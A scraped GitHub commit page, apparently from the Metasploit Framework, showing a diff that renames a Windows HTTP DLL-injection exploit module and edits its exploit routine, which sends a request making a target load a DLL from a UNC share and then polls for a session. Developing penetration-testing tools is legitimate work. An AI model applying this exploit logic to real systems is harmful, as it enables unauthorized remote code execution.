We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 03649a7 commit 710e0e5Copy full SHA for 710e0e5
…s/windows/http/generic_http_dllinject.rb …/windows/http/generic_http_dll_server.rbmodules/exploits/windows/http/generic_http_dllinject.rb renamed to modules/exploits/windows/http/generic_http_dll_server.rb
@@ -79,7 +79,7 @@ def exploit
79
else
80
share = "#{@unc}"
81
end
82
- print_status("Injecting DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{share}")
+ print_status("Requesting DLL load to #{datastore['RHOST']}:#{datastore['RPORT']} from #{share}")
83
84
sploit = datastore['URI']
85
sploit << share
@@ -89,6 +89,12 @@ def exploit
89
'uri' => sploit
90
}, 5)
91
92
- handler
+ # Wait 30 seconds for session to be created
93
+ 1.upto(30) do
94
+ break if session_created?
95
+ select(nil, nil, nil, 1)
96
+ handler
97
+ end
98
+ disconnect
99
100
0 commit comments